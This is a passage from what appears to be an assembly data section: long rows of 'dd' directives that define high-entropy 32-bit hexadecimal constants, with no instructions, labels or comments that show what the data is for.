8A67D2Bh dd 7BA94AACh, 0C1663155h, 0FA81FEE4h, 57610B47h, 0E17837A7h dd 0B65B0C58h, 93F24EBEh, 12F1EB68h, 9DAF9163h, 2C466486h dd 0FB4BE95Bh, 0AA64C0F0h, 2A117DF3h, 9A6E2EEh, 4AFCB9C9h dd 0B4069060h, 9CF51583h, 61188E1Dh, 0BF821BB4h, 1ED175F0h dd 977A52C5h, 266952FCh, 0D6083AFh, 4D4B6050h, 6867B128h dd 41063D30h, 64DCB17Ch, 0AAF9434Fh, 4FB2770Fh, 0F4767CE8h dd 188E3B85h, 949D3030h, 0A96D0FB1h, 45B7E448h, 3A526F25h dd 978B67C1h, 983AE292h, 0ECA968CCh, 0D36298C2h, 2D8AC25Dh dd 87AAB249h, 609BB438h, 2BF945B9h, 18010270h, 0FF01D419h dd 84644CA8h, 895252E4h, 0F1AA53E0h, 0B0FED9Ah, 7CA69403h dd 55471914h, 41DE284Bh, 0E2FAB86Ch, 410C864Bh, 73324F4Ch dd 0AC0C2DC0h, 52A30476h, 14EF9708h, 0DBB29154h, 3DB68C35h dd 0CF4FEB0Eh, 1EF6AC57h, 0AB47D566h, 9D2E70A0h, 52A74BE1h dd 0DA6634C3h, 0BBBD3A69h, 21E25B10h, 0DBB53224h, 0B9D68CF1h dd 11FA0AE5h, 55A4080h, 0C72A9B98h, 1F3C6147h, 87E94EC4h dd 0D15A2C7Dh, 7F9A020Dh, 8D5E5C42h, 0B5D2B644h, 6AEE4232h dd 0A97CFF83h, 3815C488h dd 4A468939h, 0F40F78D0h, 952BD086h, 59964409h, 4CE0C624h dd 1DF0A2D5h, 916FAC5Ch, 9556CF0Ch, 1B23EAFCh, 0C1C11FB0h dd 0CF5882E8h, 0BE303E8h, 0DA92463Bh, 0CBDA70A5h, 0BC9A1EDFh dd 0C3E60E8Ch, 1454E925h, 5520A205h, 5FBF2BACh, 6001CBDh dd 434C0071h, 0E9D90D00h, 43C08D4Eh, 6551B960h, 10E28E55h dd 5942843h, 3FB1B1D5h, 9966CCF8h, 0DC00A694h, 6D501A75h dd 0DF4E2BFCh, 0CEA6041Ah, 74CA7A40h, 0F5E1AAC5h, 0AA05416Ch dd 9906539Ah, 0F33604F9h, 38441E40h, 2AE13CDDh, 196C17Ch dd 0CE2F37F7h, 0B5AE9830h, 0F08C334Fh, 6636B8BAh, 0C313890Ch dd 0DAAFFA0h, 0F74A4ABDh, 0C1139EE6h, 2BBC7EB2h, 849FDC1Fh dd 0E13AB22Ch, 7F277968h, 0DAA258E5h, 0AF7B87CEh, 1ECD517h dd 6F6D3BB9h, 0AA62A485h, 0C0817BA6h, 0AF8ABD06h, 677E771h dd 63D2E9C1h, 266B1D60h, 7D0AFA62h, 712A2C98h, 98129EB4h dd 1A546D2Fh, 734752FCh, 0D696AC08h, 33B2B9A1h, 8D7F8940h dd 0D96BBA5Ch, 174F4628h, 9B87EB9Bh, 33BDC8B0h, 42668EC4h dd 0A9EFF8E7h, 23AED604h, 6102C355h, 3B4F8506h, 0BCE6E458h dd 4B221E79h, 0A23FA5B0h, 604F86C9h, 0C767064h, 2C0C2798h dd 59FA6820h, 0F92B2B69h, 0CEFCC43Bh, 0FD8A7B7Bh, 9AFE9737h dd 0C80A78BDh, 0ABC11CA8h, 9C78996h, 0CE6EC0DEh, 7DA7A3Ch dd 0B1AF6C48h, 6486DE34h, 0AB25627h, 40FAF60Dh, 929F61Dh dd 7F2C3A4h, 448793F6h, 3755BE59h, 81EE05F8h, 8A22AE16h dd 0CAEE5E61h, 9FE57CD9h, 76633168h, 1312069Fh, 0CC7AB993h dd 0A61B98ECh, 6F34B127h, 0AF057EE4h, 230B2734h, 0A7BA2212h dd 0CE5B0C8Bh, 12F2F671h, 6C648379h, 0F4D59BF6h, 0DE428747h dd 0FA2CBC1h, 5EA59BAAh, 2C91B1DCh, 3C3B6078h, 0E3C2AB87h dd 3CE2AAEBh, 1D816A7Ch, 0F126C590h, 8069E6B7h, 5695F3B0h dd 0FA0EB34Ah, 0B263CE4Fh, 0BC75050Ah, 5A026B13h, 33BAEED7h dd 9357D412h, 8EDD11FEh, 752E7656h, 0F1002F47h, 0EDF5FCF8h dd 5D7D08h, 0DA69B7C9h, 37220A56h, 52E52BD1h, 0BF44F127h dd 4C59C7h, 0FC533FF0h, 9625A3BAh, 42E5282h, 0C2EAEE69h dd 44F6A96Bh, 4B4464Dh, 0DEB4FA3Ah, 7A979B02h, 175F1EE2h dd 0BB59F0D8h, 775284A1h, 18092281h, 0A4E5E288h, 31A4046Ch dd 0F9970E34h, 97AE68DFh, 52936A03h, 0FA6405A6h, 925EA7C3h dd 3D6059B8h, 0EE247AB0h, 7BA69FBBh, 28C04B63h, 0BFC7FE55h dd 5D9FB119h, 26BC5248h, 0E532D8CDh, 695C99D6h, 9F1F40C9h dd 0D166A4D8h, 866F7FA9h, 439E480Eh, 0CFAFC5A9h, 0AC290C48h dd 93E2581Ah, 99112841h, 0CC3470A0h, 0B178420Dh, 0C7CE97D4h dd 33545DDEh, 0B265BC8Dh, 0B43BFF5Dh, 63C2097Eh, 0EAECE6EBh dd 9AAF8CD9h, 611EF41Dh, 1DC711B4h, 0DF5EE8E8h, 0F3801465h dd 686D5246h, 0D87DE425h, 76EF8810h, 9B6945A3h, 34021C5Ch dd 9B2A86D0h, 0B36DC8B0h, 31E0C8Fh, 3C897CA4h, 382E88Eh dd 50DAF02Bh, 0E4C8E0AFh, 2FD471A7h, 0BBFD3E64h, 3B897003h dd 14D20D53h, 2A564CC8h, 9C2DE5A2h, 61CA2E53h, 12555A50h dd 0E1D68AB2h, 0C41C72BCh, 63FE808Fh, 62E53D73h, 49260E74h dd 26DFBFF7h, 0FD7E9208h, 6DB7BADh, 0E0F7D548h, 35444BCBh dd 6E363840h, 0EAFA926Ch, 2A44A9DBh, 3F766896h, 58B1A08Ch dd 277AC456h, 81865E10h, 0ABD1D914h, 41D06142h, 0DFDA232Ah dd 0D7C42997h, 0C69B1694h, 9D3E4E9Ah, 7AC7FBB3h, 51763DA5h dd 94C2FB7Dh, 0FACFD800h, 4F84B8B9h, 0BDBE1F48h, 9EF2E664h dd 7D17CA35h, 7AA7C39Ch, 2156CB9Eh, 84978C3Ch, 50B9CE0Fh dd 2F8A1C61h, 2C350C28h, 0E3C2A82Bh, 107B9D60h, 0C70A7A62h dd 9B27AECCh, 492A4CB4h, 5ADE78D0h, 0EF45F879h, 356A908h dd 3E3FA451h, 0DDEFE20h, 0EAEC500Eh, 0D118F9CDh, 4B74BA94h dd 8A6C19E0h, 0DF658C59h, 0BC89A4E8h, 83826922h, 9CE935E6h dd 0DFCA0A2Ch, 91E66454h, 0A84DED23h, 6B2C2BDBh, 9F763EE8h dd 0C7DC5937h, 3BE126F4h, 0AD8E8007h, 1F4B6F91h, 0EC9F3428h dd 0ABDC78E9h, 0E0C30070h, 63F2BD73h, 9E369CA8h, 6D1BB88Dh dd 394004A5h, 288AE6B0h, 21988E8Dh, 8402DB34h, 0E5DC8DD4h dd 3A92816Ch, 14166C88h, 0E32BD911h, 0F0C379C0h, 0A77A45CEh dd 0FE73D210h, 4D1FADEBh, 0B5BE980Fh, 0DCA6643h, 85773C68h dd 0C3129714h, 1C2F98F4h, 0E2B54ABCh, 0D1769A2Eh, 2A123A75h dd 0ECE5810h, 8DBAD8F8h, 6C099B7h, 53776674h, 8503B5D9h dd 472A0914h, 9FECE147h, 1989CEC4h, 4B119573h, 0DA9A821Ch dd 7A335101h, 33D2265Ah, 82EC059Fh, 0D78FEA6Ch, 70AFC097h dd 8BC99EB4h, 0DA5E73DCh, 10FFDDDCh, 1F96BC16h, 23F341A1h dd 8DA46140h, 0E580BB36h, 7E088187h, 63A16E84h, 95BAC74Fh dd 0DC5A22CDh, 0B71DE965h, 13F8D614h, 0C8516372h, 0B7DAB4C2h dd 94E924DDh, 6B023F34h, 0DB92251Dh, 178BF2BCh, 86AC7020h dd 0D3E6CE1Bh, 6D00000h, 0A39ED3FAh, 63534B6Ch, 0B6E21E6Ah dd 85E0F2CDh, 71B738Ch, 0B6C9E6B5h, 0BDD5E349h, 0FD04D0F0h dd 578A3E94h, 4EF5D618h, 1BFDD4A1h, 419AB550h, 576F1F78h dd 4916FCCAh, 0F838F0ABh, 0C5A8484h, 6D68F23Ch, 83CC46F9h dd 0D0A1E406h, 0B5B62C74h, 6F1B6DADh, 0ADFDED60h, 71ED06A0h dd 0D593FDF0h, 1F4ADA83h, 516624C4h, 0D3B450D1h, 2BBEF630h dd 7A9F080Ch, 0C1EEA26Dh, 36D29E41h, 22444AF3h, 0C70AD4D5h dd 1BD30BEFh, 0FA625EEAh, 0D57E0434h, 7F9A680Ch, 1C490F7Fh dd 0E3C2894Eh, 287E9DEBh, 97606A6Ch, 384DDF7Bh, 4EAA4FB9h dd 835E78D0h, 0FF70B6C9h, 6303D35Fh, 30B2961Ah, 0E69EEC84h dd 67ED5257h, 7C8B9478h, 1B32F034h, 0E0C11BE7h, 0CF4A9DC6h dd 7D083C6Dh, 0BCDAE389h, 782DB030h, 37DA1FACh, 0D66BE958h dd 0C002AE35h, 141E725Eh, 0AC521FAh, 0F946F3CEh, 2D72DE67h dd 5305112Fh, 38E26F91h, 6C763428h, 0AB9720A6h, 0EFD40010h dd 1D7BBD73h, 443F7FBFh, 0C9B9F7B3h, 0B3459F6Bh, 0E8C21771h dd 95550408h, 3229A9B3h, 1F4B4703h, 0BFFA0252h, 89031B35h dd 0D946C7A4h, 4D3B10A8h, 0DFF85DCh, 8186C4C6h, 4BE369A9h dd 0A4CA8830h, 11B5678Bh, 69F63C78h, 46D49684h, 1D3EB1E7h dd 8942A3BCh, 54A15B27h, 2B92EB74h, 59E5810h, 0DFBE7071h dd 19990645h, 0FD9D090Ah, 0CD68AFA0h, 224C73F0h, 81095499h dd 9E0FA7A0h, 75115CD0h, 0CAF6E76Fh, 7DD7AE4Ah, 69DF1721h dd 9DCEB040h, 642AA55Ch, 144B29EDh, 0AA25BEC6h, 4B3B9CA2h dd 2D705FCDh, 0B7F3C06Dh, 40D76A50h, 0ADB70C33h, 979ADB34h dd 2F673401h, 0E3474EF0h, 815DADC0h, 632E4CADh, 0C8020FC8h dd 6DFBB26Ah, 708E0A47h, 0D69D8031h, 788E872Ch, 0A22591Ah dd 0A13EF4FCh, 7E1A8BCDh, 177628A6h, 0A71AC18Dh, 42E8202Ch dd 0F5CC7A6Eh, 85A8D151h, 1BAB2E27h, 0E1970907h, 0B810CFB6h dd 2C4479C0h, 0C62017E4h, 8801A9C0h, 25EC0AD0h, 0D5C8E171h dd 48E2E147h, 44BB553Fh, 9F8EDB4Ch, 6D369FE1h, 52572BCDh dd 0EA3AE9E0h, 4606DAAFh, 29A7318Ch, 6EEE0CB5h, 1CD65D35h dd 0FCAC458h, 0AE96D291h, 50708F29h, 7A3ED6B4h, 0AB329635h dd 0CAA44814h, 227DD43Bh, 0BD632F45h, 0D3809CCh, 0B90E34FBh dd 13F2E664h, 6D0E4080h, 0C72A9A9Ch, 2146F4B8h, 7B624ED4h dd 0D57EA8F0h, 2F9A020Ch, 89B65C28h, 0E3D2B644h, 3DEE1060h dd 970A6A7Ch, 0F126C498h dd 4B421EB4h, 0A55E78D0h, 0FF7AD2ECh, 59962C08h, 0B3B28624h dd 0DCEE040h, 67EA3A5Ch, 0A1069478h, 599A4B17h, 0F63E48A0h dd 0DF181E69h, 9E79FCE8h, 0D01F4247h, 9619BF38h, 0BC1A093Ah dd 0BAC2401Ch, 0F270B236h, 36165AABh, 8B78F9B8h, 705A8EE3h dd 43309E71h, 110B0900h, 0ECAACA5Eh, 4904B73Dh, 798357B6h dd 9076E874h, 6F0A66D3h, 0C936F840h, 23729EC4h, 0F8E350E0h dd 0D79A8970h, 45BE3D41h, 8F02DD38h, 60214FB2h, 3FEA50F8h dd 9ACF9B4Bh, 0E3169929h, 0B25EC3C0h, 0A7E586ACh, 0E3823C7Bh dd 0D73FA7E2h, 36BE9813h, 0AAEE276h, 1BF50E43h, 3F5C1B94h dd 9E70ABF8h, 733E4A86h, 0D28D9627h, 0C3928C0Bh, 7A61A747h dd 52917C07h, 39C64EF4h, 0A7B9653Ch, 758B4F43h, 802A0ADEh dd 0B104E03Dh, 0FB62CED4h, 5542C0F0h, 2A11820Ch, 9A69EBCh dd 9C249FACh, 0BDF6789Fh, 0AA89EA7Ch, 7136060Ch, 424AEBB4h dd 357AF04Dh, 80E6B9ECh, 0C9D43885h, 0B63DC524h, 8DDE22D8h dd 0A57E2FD5h, 42EE1468h, 0A8226E94h, 66B50B79h, 4F5A224Ch dd 579B94BAh, 969129FBh, 5DBE729Ch, 0CD495C3Fh, 95E9E454h dd 6B023F73h, 0C50EE213h, 1FC776A3h, 3BDD4CC8h, 1B9AF6E8h dd 2E71FFFEh, 97E8E699h, 0B100B738h, 0C26206DEh, 15E71C70h dd 0EC6EEC75h, 0C2C7F7E8h, 42D3778Ch, 22B10F3Fh, 1BCED37Dh dd 5DD38454h, 880AF56Dh, 0EAD1C2A9h, 0BFFA92DBh, 0E76E6DEEh dd 0F63D7497h, 0CD4EA06Bh, 2750798Ah, 0CB0D518Dh, 50A04504h dd 644F0B3Ah, 702410A4h, 5543BF97h, 0EE1206C6h, 6656B025h dd 0F7CE4EB3h, 0E49924D8h, 0AB923C48h, 0FBCB3040h, 0DAB9CDD3h dd 0B9C6CEF4h, 514E63EBh, 690D4090h, 7A9C9B8h, 2E9DC7BAh dd 69814662h, 865E6170h, 2BBE26CDh, 0A0924001h, 0A3899248h dd 0C66FF98Bh, 4AB1BD73h, 0AA7FAECh, 902C5B1Ch, 5EDF4EA4h dd 0DBE9B5h, 0A217027Ch, 1F07A4F2h, 0F64FC634h, 94B2D3CFh dd 3A878A0Ch, 0E87A07E9h, 8EBF5EC4h, 2E7F9D8Ah, 0D2F7F29Ch dd 62B76934h, 4851B654h, 37DA48A4h, 6E978D03h, 685C418Bh dd 0AAF70C52h, 5CC58D52h, 0A152A6CAh, 0AC876F0Ch, 941B08FFh dd 61AACA3Ah, 63DE0580h, 0B8064EB6h, 0BE980A72h, 874244E6h dd 36C96986h, 0A45A3447h, 256B3A31h, 287F8B14h, 325C84E7h dd 0DB725547h, 0C3E73D52h, 0D450127Ch, 0C17E06AFh, 0F0C8460Eh dd 5CFE38B5h, 589F7B34h, 1876C07h, 89262E14h, 556F8544h dd 0F93128B2h, 694E3983h, 68929684h, 90ED4F42h, 6773DA29h dd 26B18FD8h, 0AE753D2Eh, 858E6194h, 0D7BAB22Ch, 0F8169947h dd 16046D84h, 0ED1EF902h, 212C6F9Dh, 4A63FDB5h, 79E738C7h dd 577E38C9h, 0A2FC8479h, 0D5DF919h, 46D33B22h, 1063B06h dd 9CF51583h, 0E4AF70DBh, 0CB52DC18h, 0A0A93B7Bh, 7F6A6B68h dd 0D196AC08h, 3772932Bh, 1126CAFCh, 6E1545A3h, 5144A4EDh dd 19A79894h, 0F43ED889h, 7E5526B9h, 695D7E03h, 866515AFh dd 5DBE09A4h, 0BFCA8A3Ch, 946CC32Ch, 6B12070Ah, 0A3157851h dd 797F79A1h, 0D3AEFC63h, 0EA0C236Eh, 0CD4F0010h, 0E3CD5F07h dd 0D26DB2B1h, 0D0496894h, 1A9AD062h, 65B1C289h, 590F622Dh dd 620A72C4h, 3EC5C800h, 701EAF3Ah, 5AAF8408h, 0E03E6E11h dd 8E665E70h, 5451F46Ch, 41128691h, 8CC64F4Ch, 1F4A2D3Fh dd 41621A1Dh, 0E746DDFDh, 6BA145BFh, 20D4A2A0h, 7C2A8A14h dd 6C764397h, 43023110h, 95D4F0A6h, 25CEE5CFh, 9B98E7ACh dd 617CBD80h, 0CF601F64h, 9544EB58h, 7328803Ch, 0D90CE910h dd 94BE4FF4h, 409A5177h, 0CA9D4412h, 9097FE10h, 3E861830h dd 0AA6DC1B0h, 89A665ACh, 0E3D29644h, 3F9B96D0h, 0D8876E78h dd 8D834E66h, 2D420E8Dh, 0A0A2F87Bh, 0FFCAD599h, 19696388h dd 4CD06E8Eh, 88391FBFh, 67FA03D8h, 0C106D478h, 2A4456F2h dd 5C8A4AC5h, 0D7EA09AAh, 100879E2h, 63525614h, 0E0461A23h dd 8735F5C3h, 156393D0h, 0EB02AE4Dh, 301E1810h, 15BCC2AEh dd 0E96FB06Dh, 0D3D940E4h, 0AAFB85FCh, 482ADAACh, 0A26C74C7h dd 827233D9h, 1816E860h, 98E5BD73h, 0D90F182Dh, 2352F6C4h dd 0CD6D24F0h, 527D009Ch, 31B63D9Ch, 83C25E34h, 0B066BF24h dd 94FAFEE7h, 1D939BC7h, 0F032D69Dh, 424F20C0h, 0A76A8A58h dd 0AB6E64F8h, 0C71FA7BFh, 5DBE9872h, 0F0251C80h, 0C25CD4D8h dd 81B22B0Dh, 0A0C6F0B0h, 80B5B542h, 0C15F205Dh, 2B82FDF4h dd 72842C10h, 0CF8336A9h, 39D60C48h, 7BF81265h, 12F13EAEh dd 0B8D48174h, 0BAFC447h, 67E7457Fh, 0DE7E38B2h, 2652A9C3h dd 19F47895h, 9F9ABF44h, 428AF7D8h, 0D739414Ah, 0F4D1EFFEh dd 0CB52A730h, 255EF8D3h, 0FA8C4198h, 0D986958Ah, 0DBB872A4h dd 72319DEAh, 1814E1B4h, 2561AC87h, 0A889481Dh, 295AE70h dd 5F63A649h, 0A9767FE8h, 0F5C8A204h, 4D97B2A5h, 0BDBF0A3Ch dd 0EE1B65B0h, 9530D68Bh, 0C7F6676Fh, 0AFC50D51h, 8242A4E8h dd 0EA91591Bh, 3871B866h, 2C3BF17Ah, 0D84221B3h, 0E9150E44h dd 95FDAA87h, 0FB6FC28Ch, 0B6CAC040h, 4B4DC63Bh, 2912A0Eh dd 4275929Ah, 1A372F7Eh, 8E4911BFh, 65CE7AF4h, 0F7735A47h dd 9D931B74h, 7032569Dh, 0B94EA0C0h, 0A3EF0DE4h, 818644C1h dd 0AFA4AE14h, 0B13BFF1Ch, 8FDA7275h, 9CF7BC68h, 0BED0FE8Eh dd 0D6C68F5Fh, 0B53541h, 415FA05Dh, 0AB827EF4h, 0ED94AC14h dd 0A045CF80h, 462BEDA0h, 9777119Bh, 690E50B9h, 0B32A9A9Ch dd 0DCD01CAFh, 52DAB12Bh, 7EB65630h, 5B5A0AB4h, 0FC0EF72Ch dd 48B55DBCh, 0C2136F88h, 138F9D83h, 0F926D4A1h, 3E421EB4h dd 27E3F8A2h, 0FF7AC2D5h, 3C7E457Ch, 0B4D79D9h, 0C4E7F869h dd 5E949F56h, 25C69468h, 6587E497h, 0DE3E5889h, 30A7E924h dd 83C74C17h, 0BA10D38Eh, 3504B030h, 0C835F700h, 0EF63D257h dd 6602AE4Dh, 51AD894h, 2F32926Dh, 49FDAA45h, 0BB258CE5h dd 52717D20h, 618EE635h, 383DD680h, 82660BA3h, 15EEE860h dd 686E428Ch, 0AF9CD518h, 21A8837Ch, 95C53601h, 28755600h dd 20CECA8h, 364BF5F4h, 0E5CEFAD8h, 67E979Bh, 99366C98h dd 0E447C6A4h, 0B190C897h, 2C308523h, 2ADE6437h, 272724DEh dd 3CBE9809h, 0E7701E06h, 9609C0A0h, 3932EE2h, 24AA7557h dd 770A4AACh, 0D212A4D8h, 21AA3A74h, 95A724B5h, 5611D42Ch dd 299480F5h, 1605CD64h, 0ED1EF904h, 72A1A9Ch, 0F1F67DCDh dd 0C21E4BD6h, 0A2D428E0h, 0BFA30689h, 9B65C28h, 0D3D94344h dd 0C06B9AD8h, 0BD0AFA45h, 0C9407973h, 4EB58685h, 254EC154h dd 7F7A53ECh, 0F026AE7Ch, 0ACFA32Eh, 690E6050h, 9A4FB05Fh dd 27060441h, 1A9A083Fh, 71BB3F40h, 4F5A32F5h, 0DC767CEAh dd 95A6206h, 4D974D85h, 3E61EC3Ch, 1A44CE5h, 42928674h dd 32B59890h, 0F037629h, 795644C8h, 3B03D2E4h, 0D271FC20h dd 0BE2EDFEBh, 0E5C6B428h, 30970E54h, 10F4D0C0h, 0EF0AFBF2h dd 0BE7BF702h, 0B36BF241h, 0FD66D0E0h, 319B5FFCh, 0BB4607A0h dd 1BFBA091h, 56755E50h, 0AA1138ACh, 13F54EEh, 4A4CE3AEh dd 298EA0D0h, 59CFF0DFh, 0E78644C1h, 5F2759BFh, 35BE1809h dd 0E9DA625Ch, 9D363DD0h, 4BD69687h, 0A450D5AAh, 5C2CCAACh dd 0D3E392D7h, 826ECDh, 0FA6577F8h, 0DB3FC5D3h, 0B9D69C71h dd 67B2E664h, 6F5EF08Eh, 0D713E619h, 0B4AE5EB8h, 0F69DB12Fh dd 58F756BFh, 2F8A409Ch, 0B032D9DFh, 0E3D2B654h, 319A9060h dd 3CA082CCh, 0B3927911h dd 4EA91EA4h, 5AA59938h, 4103A13h, 0DC61D3F7h, 0B3A2BFA0h dd 0DCFE040h, 275A3129h, 0F87A1172h, 0F088EE84h, 0F6862EBFh dd 0B3FFA80Ch, 4F76ECD1h, 2993E6AFh, 0E42A35D7h, 37CA0A2Ch dd 0BE93645Ah, 0D2863B83h, 451E1880h, 854F72A8h, 7C5C0C78h dd 53621F9Ah, 940D258Ah, 0E76BDA0Ch, 77E5228h, 0BB5225D5h dd 554EE09Bh, 5664C786h, 3E9C9CB8h, 336B7241h, 756E50E0h dd 0B19ADFFCh, 3B4E87A0h, 9BFB2391h, 5575DE50h, 8FF2F96Dh dd 0E49366C0h, 5932D69Dh, 0B2B4FF28h, 23EF8D23h, 186C4C1h dd 0EAA23E14h, 0D39BFD45h, 52261F4h, 79CF41CDh, 0F0B9F084h dd 0A0075A60h, 775A082Ch, 0E8E2212Fh, 2B82FEE4h, 9AEB5830h dd 0C451C59Dh, 21DFB42Eh, 0AA8FC36Eh, 9CEC090h, 3A8F109Fh dd 0C7466481h, 6BDFE77Fh, 0DF7E38B2h, 3F3F08CDh, 6FB6CC6Ah dd 618A86EFh, 0ADD7ECE5h, 6EE2407Ch, 86D9BB62h, 0DB7B1A31h dd 255EFBD0h, 885626EDh, 0C9AF288Dh, 33B20624h, 7AEE1544h dd 0F7D33ED9h, 41061478h, 73281B97h, 0AC1316Eh, 0B0A06924h dd 53769417h, 427A29FBh, 0AA51CFDAh, 0A7F30EB9h, 11E6E458h dd 0DB0A4A7Ch, 0E8F63259h, 0E8C50D56h, 696FC84Dh, 0D372A6E4h dd 9DA47410h, 0FB2F701Bh, 20C6A401h, 0B2EF14B4h, 97FE4C78h dd 0FF23BE29h, 4AD2DCA8h, 856B244h, 2972F08h, 0FDEB9A03h dd 4E5F73F0h, 0F47AB8CBh, 197B32B0h, 0D9FA8255h, 0E0F00423h dd 0F6C5B95Bh, 0CD5E9944h, 276AFAFCh, 460D108Ch, 992A239Fh dd 0F4950820h, 3F2623C5h, 9573B630h, 0E91206BDh, 62D7CF48h dd 73CF3D43h, 516634E1h, 0DF823EF4h, 5526BE1Ch, 233F38EFh dd 52D69C71h, 0EC4A806Eh, 11AB4A60h, 0A12A8AA5h, 0D8D01C13h dd 0FE95B12Bh, 0D56E9174h, 2E9A020Fh, 463D035Ch, 0A17233CFh dd 0F5C51070h, 0A4F622F5h, 75A33351h, 4B420E8Dh, 0D05EF8D0h dd 83FF5FE2h, 0D3963C31h, 4A32C62Ch, 80369343h, 43AEF758h dd 21C79468h, 0B0A95E9Ch, 0CD584E53h, 643C62FDh, 0A9F9448Eh dd 8392EE6Ch, 0BB4FB220h, 0B2615297h, 0F7E01191h, 8DC28FCCh dd 0EFDDA83Bh, 60C35944h, 7DD33B37h, 537236DDh, 0D90E8000h dd 8C655106h, 718480BDh, 322AA554h, 6A161438h, 0DFE5BD75h dd 0CCDE366Bh, 0AEAD093Dh, 6D57C065h, 530F5DFCh, 31A61421h dd 0FEE25E34h, 1DF5EF56h, 0B4E3F934h, 613D44DBh, 7EB9168Fh dd 4D5E6268h, 0E5E2EFDDh, 3887D4E8h, 5F866A9Fh, 0A5D635B9h dd 0B251E25Ch, 69E67EE4h, 819A13AFh, 98D9F0B0h, 775A7338h dd 0D166A498h, 0F375FC80h, 859A9ABBh, 6239E57Ah, 39C64E8Ch dd 4A766964h, 50EC081h, 472A1A91h, 0EF1431F3h, 0C9518291h dd 19326CDEh, 0DD0F7D0Ch, 80B6CC16h, 7390EEC1h, 0E565C360h dd 0E8D2E940h, 32AD6CEBh, 3E5B7680h, 0B0D5072Fh, 7F6A1054h dd 0D5D4AF53h, 716E83ADh, 0CFCD6050h, 76F3354h, 0CA06043Ah dd 28DD46E7h, 0F53EC830h, 0B0AED024h, 11CBF717h, 5592C646h dd 0A25AD6C8h, 0F5F01C3h, 9AE6F41Ah, 2101363Eh, 46D0B39Ch dd 9735F745h, 79564DA8h, 0D22822EBh, 988D0000h, 87BA18A0h dd 0A3BE013Bh, 74E0E44h, 377B6798h, 621AC28Ch, 0CC1D18EEh dd 0A34234BCh, 153ED6E3h, 0A875DE5Fh, 0F31E399Bh, 7EC2DE24h dd 6999035Bh, 0BEE11163h, 15FDEC88h, 318AD39Dh, 4841A0D0h dd 276AFBD1h, 0C3FED1FBh, 5AC4AE04h, 3A9BF708h, 8FDA9EC9h dd 0EBB63768h, 132655AFh, 62DA1648h, 4FF7F343h, 5E66349Ah dd 0AB829A71h, 0B91BDB10h, 5CBA226Eh, 0A994F4CDh, 38F26D64h dd 0EF014CC7h, 0C72A9A51h, 2E4EB383h, 7B628A57h, 0D7BE2BF0h dd 2C8E450Fh, 99F424ADh, 1C82E444h, 2DACC8D5h, 0A59F957Ch dd 0AB26D4A6h, 0CE4DDE31h, 0A55E7867h, 0FF7A4E05h, 56691008h dd 0B3B212A1h, 18F06040h, 6761BF53h, 878D9478h, 2F61C595h dd 86CBA0E0h, 72635D33h, 2966BE50h, 6912171h, 0DDBEF29Ch dd 75B28F3Fh, 146F6448h, 0EB12FC90h, 0C025181Bh, 9F2A3070h dd 7C6DC4BAh, 53626404h, 0ADB3E972h, 75DADA1Ch, 61D9DC0Fh dd 0F56F8E54h, 3E3F638Ch, 7F58418Eh, 8BD21993h, 2F27F6D4h dd 827E9463h, 0F3CE25CDh, 2A4D6504h, 1347D1F7h, 85DEA812h dd 7D82A7E7h, 0AFE6C98h, 92CD3950h, 4D4E2069h, 8C640F5Ch dd 8F4D8BFh, 54AA692Fh, 4A41B4B2h, 8AD5ABB3h, 9609C2DAh dd 4236AA0Fh, 1D077407h, 88B5B5BCh, 50244F37h, 2BE2DABEh dd 0B6D0B810h, 0FBB639ECh, 7B1289CFh, 167B6674h, 0ED1E8240h dd 6EA2A311h, 244574B8h, 0FB728CACh, 1BDB8D96h, 0ED994427h dd 5F4F73Ch, 8B297082h, 0BDBD11A7h, 170FEA7Ch, 37AF4498h dd 81CC148h, 5BCB0787h, 0BE7A42D2h, 5C99B3E0h, 33B2073Eh dd 0A5A43410h, 72154536h, 41162AA6h, 947DAE11h, 0F53FCD38h dd 0ABD6CACCh, 0B89E8317h, 5092D604h, 34E84445h, 0D299EF50h dd 7894913Bh, 6B434700h, 87522D6Fh, 8AC5F2BCh, 794672FAh dd 9126236Dh, 34660010h, 0D4AA5A1Ch, 8AA7E05Dh, 55954131h dd 0FD8D1A15h, 9D4AB2E5h, 255F6AC1h, 0A33711A1h, 153338B7h dd 4462D503h, 0E2A68418h, 78A78C51h, 0AC5724h, 0C993E03Ch dd 7E7380E1h, 9B6546C1h, 32B148FFh, 276AE834h, 0C3E307F8h dd 0AEC9CD75h, 5CCC5840h, 0EAB60B3Ah, 0BEF6D90Fh, 0BCFA346Ch dd 9D36985Fh, 9219CABCh, 3F074C9Bh, 0C4CC1B93h, 7CF8B164h dd 29D3407Ch, 0DEB3E021h, 0FBA5E601h, 92F1A77Fh, 42A7CECCh dd 2156C928h, 11322ABEh, 4081FFF1h, 2F8A3CE6h, 769260A1h dd 0F3EC90D1h, 0B02E3A60h, 874B22C1h, 0A1769498h, 76D2AB4Bh dd 0A43678C0h, 0AB7AD6ECh, 0A6C12D62h, 0A3F0D2B1h, 9A4B440h dd 337FC50Bh, 4206843Ah, 0AEDDFA50h, 752E0AFCh, 0F1383733h dd 0EA29FCF8h, 0C2DAE389h, 22F8B030h, 27F46CA9h, 6E1EE758h dd 0EBB93A7Bh, 0C0971890h, 9F2A30F4h, 600CCA2h, 434C8471h dd 0A24E0500h, 7AA7E98h, 31061F38h, 0EBE1E404h, 1596E91Ah dd 39DA428Ch, 0F7740957h, 0DBD1F6D4h, 7AEA5F1Fh, 5E8AAAFAh dd 21E4589Dh, 0EB4FD334h, 68DEA812h, 2FB87AF9h, 0F3443D88h dd 66CD96A4h, 4D5E1EAEh, 0A895825Fh, 183017Ch, 0A4A24414h dd 0A5FCD485h, 654F1D4Ch, 0EAF62C56h, 471D697Ch, 1D2EF51Eh dd 353ACF35h, 1855A4C8h, 7BD33DF7h, 0D49A3241h, 9DE607D3h dd 0AC290C58h, 93E25822h, 69010005h, 472A1F06h, 24CFBD8Bh dd 0FB728CA0h, 3D2F79A1h, 0AF958213h, 87232378h, 0E6D2267Ah dd 0EE6A9FA0h, 9E0AEA79h, 61643C1Dh, 20FA5DB4h, 0AE5EF8A2h dd 0FA8D6AA7h, 0D986958Ch, 13B20624h, 8CD6635h, 0E7FAAA34h dd 8005C64Bh, 7AD59F63h, 0B7BA4D39h, 0C0E222DCh, 22767CC1h dd 8691EA4Fh, 5DBE2048h, 76C9580Fh, 0F01115AFh, 297EBBFDh dd 0CADD9880h, 0E63CB91Bh, 2ADB792Bh, 90C5A9FCh, 645E0314h dd 84829B77h, 0BEFC35E8h, 0C28C6723h, 0EF7D7504h, 0F68C380h dd 0C20A5723h, 0E1516286h, 0B52A5DF0h, 7453DD03h, 0C123BFD9h dd 0C8C2CE76h, 75FA6CDBh, 3D75525Fh, 